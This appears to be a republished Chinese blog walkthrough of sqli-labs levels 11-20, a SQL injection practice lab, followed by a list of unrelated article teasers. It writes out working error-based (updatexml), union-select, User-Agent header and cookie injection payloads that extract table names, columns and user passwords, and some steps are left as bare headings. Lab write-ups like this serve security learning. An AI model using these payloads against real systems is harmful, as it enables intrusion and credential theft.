sql-labs(11-20)

1.less-11

1.判断类型

根据测试在使用 " 不会报错,' 会报错,所以他是字符型的并且被单引号闭合,而且只有用户

登陆成功才会显示数据。所以先尝试报错注入

2.爆数据库

' and updatexml(2,concat(0x7e,(select database()),0x7e),2)--+

3.爆数据表

4.爆字段

5.爆数据

2.less-12

1.判断类型

经过测试发现是xx型,通过双引号闭合。 并且没有正常回显。

2.判断字段个数

3.获取当前的数据库

 4.获取数据表

") union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()--+

5. 获取字段

") union select 1,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'--+

 6.获取数据

") union select 1,group_concat(username,password) from users--+

3.less-13

1.判断类型

 

经过测试发现 是单引号闭合的xx型与less-12 大致相同。

4.less-14 

与less-11类似

1.判断类型

2.判断字段个数

剩下步骤与less-13,less-12类似。 

5.less-15

1.判断类型

经过测试发现只有登陆成功,失败的界面,尝试盲注, 

由于手工比较麻烦可以使用sqlmap尝试。

6.less-16

也是布尔盲注操作同上。

7.less-17

出现数据 的 delete、update、insert直接用报错注入。 

1.爆字段 

' and updatexml(2,concat(0x7e,(select database()),0x7e),0)#

 2.爆数据表

' and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),1),1)--+

3.爆字段

1' and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),1),1)--+

4.爆数据 

会报错因为同一张表不能同时更新,查看。查看其他表不报错

8.less-18

使用正确的密码登陆发现出现UA信息,发现是UA注入,所以尝试报错注入,而且是单引号闭合

通过查看源码,拼接的sql语句要多加 )才能执行顺利。

爆数据库

sql语句

INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('1',2,updatexml(1,concat(0x7e,(select database())),1))#', '192.168.190.1', 'Dhakkan')
1',2,updatexml(1,concat(0x7e,(select database())),1))#

按步骤执行下去即可,其余 前面已有介绍,这里就不展示了。

 9.less-19

与less-18类似,是refer注入  

 10.less-20

cookies注入 ,根据源代码, uname参数不可省。

 爆数据库

uname=admin'and updatexml(1,concat(1,(database()),1),2)--+

报数据表 

uname=admin'and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema="security" ),1),2)--+

爆字段

uname=admin' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security' )),0)#

 爆数据

uname=admin' and updatexml(1,concat(0x7e,(select group_concat(password)from users )),0)# 

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/bicheng/10168.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

图文教程 | 2024年最新VSCode下载和安装教程c/c++环境配置,json文件详解,实用插件分享

前言 📢博客主页:程序源⠀-CSDN博客 📢欢迎点赞👍收藏⭐留言📝如有错误敬请指正! 由于重装电脑,需要重新安装VsCode,记录安装配置过程。 一、VSCode下载 官网地址: Vis…

【激活函数--中】激活函数和阶跃函数的可视化及对比

文章目录 一、Python中绘制阶跃函数的图形二、实现和可视化Sigmoid函数2.1 Python实现2.2 可视化Sigmoid函数 三、比较Sigmoid函数与阶跃函数3.1 Sigmoid函数与阶跃函数的差异3.2 Sigmoid函数与阶跃函数的共同点 一、Python中绘制阶跃函数的图形 在Python中实现阶跃函数的代码…

ZFS 文件系统结构及 ZFS 文件系统数据恢复

ZFS是一种革命性的文件系统,它遵循完全不同的文件系统管理方法,同时提供目前其他文件系统无法提供的新功能和优势。ZFS 可靠、可扩展且易于管理。 它放弃了卷的概念,从而摆脱了传统的文件系统原则。另外,ZFS 提供更复杂的存储池&…

公检法部门涉密网文件导出,哪种方案最安全适合?

公检法是我国政法机关的重要组成部分,由于公检法涉及重要案件信息和个人隐私数据,因此,在内部多采用网络隔离技术将网络隔离为两个及以上网络区域,如涉密网、办公网、外联区等。 公检法涉密网是指公安机关、检察机关和法院等执法机…

用于计算Quartz中,下次触发时间距离当前时间的程序

在 .NET 中,一个 Tick 是100纳秒。所以,你可以将这个 Ticks 值转换为 DateTime,然后与当前时间进行比较,以确定下一次触发的时间。 using System; namespace HelloWorldApplication {class HelloWorld{static void Main(string[]…

UE 将UTextureRenderTarget2D,FTextureResource,FTextureRHIRef,FRHITexture写成图片

目录 一,写带通道的RGBA图片(BMP) 1,写BMP图片的代码: 2,获取图片buffer,并写成代码 二,使用UE提供的接口写png图片 1, FTextureResource写成图片 2,UTextureRenderTarget2D写…

Java基础入门day47

day47 CS、BS CS或者BS是软件发展过程中出现的两种软件架构方式 CS:Clint server 特点: 必须在客户端安装特定软件 优点:图形效果显示较好 缺点:服务器软件和功能进行升级,客户端也需要升级,不利于维护 常…

Git操作GitHub全记录

目录 一. GitHub ssh-key配置二. 添加GitHub仓库Git提交本地代码到Github仓库远程克隆仓库到本地的文件夹再上传本地的无.git的文件夹上传到远程仓库 三. Git删除Github仓库或某个文件或文件夹1.删除已有Github仓库2.删除Github中的某个文件或文件夹①如果没有建立本地库或者克…

第12节 第二种shellcode编写实战(1)

我最近在做一个关于shellcode入门和开发的专题课👩🏻‍💻,主要面向对网络安全技术感兴趣的小伙伴。这是视频版内容对应的文字版材料,内容里面的每一个环境我都亲自测试实操过的记录,有需要的小伙伴可以参考…

java数据结构与算法(链表快排)

以下内容是被验证可以高效理解该算法且方便实践的。如果你发现还有很多需要增加的,欢迎留言。 前言 链表的快速排序方法和数组的快速排序还存在较大差异,深入理解的基础上再动手试试吧。每日更新2题,希望学习的小伙伴可以关注一波。评论区…

AI技术构建本地知识库的流程

构建本地知识库是一个复杂的过程,涉及以下几个步骤,使用大模型技术构建本地知识库是一种很有前途的方法。随着大模型技术的不断发展,我们可以期待本地知识库将变得更加智能、高效和准确。北京木奇移动技术有限公司,专业的软件外包…

设计模式1——初步认识篇

设计模式1——初步认识篇 一、先让我们浅聊一下面向对象和设计模式。 说起设计模式,我第一次听到它,是在学习面向对象的时候。那么什么是面向对象,什么是设计模式,而且设计模式和面向对象又有什么关系呢? 1、什么是面…

你不知道的ConstraintLayout高级用法

文章目录 1. ConstraintLayout介绍2. 高级用法2.1 Gone Margin2.2 偏移2.3 居中2.4 尺寸约束2.5 链2.6 角度定位(圆形定位) 3. 工具类3.1 Guideline(参考线)3.2 Barrier(栅栏)3.3 Group(组&…

路由发布中的前缀列表的使用方法 ip prefix-list

路由重发布中的前缀列表 一、前缀列表的特点: (1)、可以增量修改,我们知道对于普通访问控制列表,我们不能删除该列表中的某个条目,如果想删除列表中的某个条目只能将该访问列表全部删除,而前缀…

【Camera2完整流程分析四】从log角度分析CameraService启动流程

下面直接带你通过log打印来一起读CameraService启动的过程。 1)Camera service对象构建,在启动的时候先创建CameraService 这里会打印: CameraService: CameraService started (pid=559)接着启动的时候会执行 –》onFirstRef() 进入这里面看,先输出打印: CameraService:…

信息与未来2017真题笔记

T1. 龟兔赛跑 题目描述 兔子又来找乌龟赛跑啦!同样的错误兔子不会犯两次,所以兔子提出赛跑的时候,乌龟就觉得这场比赛很不公平。于是兔子进一步放宽了条件,表示他可以在比赛开始以后先睡 t t t 分钟再开始追乌龟。 乌龟这下没…

YOLOv5改进 | 注意力机制 | 用于移动端的高效坐标CA注意力机制

在深度学习目标检测领域,YOLOv5成为了备受关注的模型之一。本文给大家带来的是能用于移动端的高效坐标CA注意力机制。文章在介绍主要的原理后,将手把手教学如何进行模块的代码添加和修改,并将修改后的完整代码放在文章的最后,方便…

答辩PPT不会做?试试这些AI工具,一键生成

在我原本的认知里面,答辩PPT是要包含论文各个章节的,在答辩时需要方方面面都讲到的,什么摘要、文献综述、实证分析、研究结果样样不落。但是,这大错特错! 答辩PPT环节时长一般不超过5分钟,老师想要的答辩P…

25、Flink 支持的数据类型及序列化详解

数据类型及序列化 1.概览 a)概述 Flink 以其独特的方式来处理数据类型及序列化,包括它自身的类型描述符、泛型类型提取以及类型序列化框架。 支持的数据类型 Java Tuples and Scala Case Classes Java POJOs Primitive Types Regular Classes Value…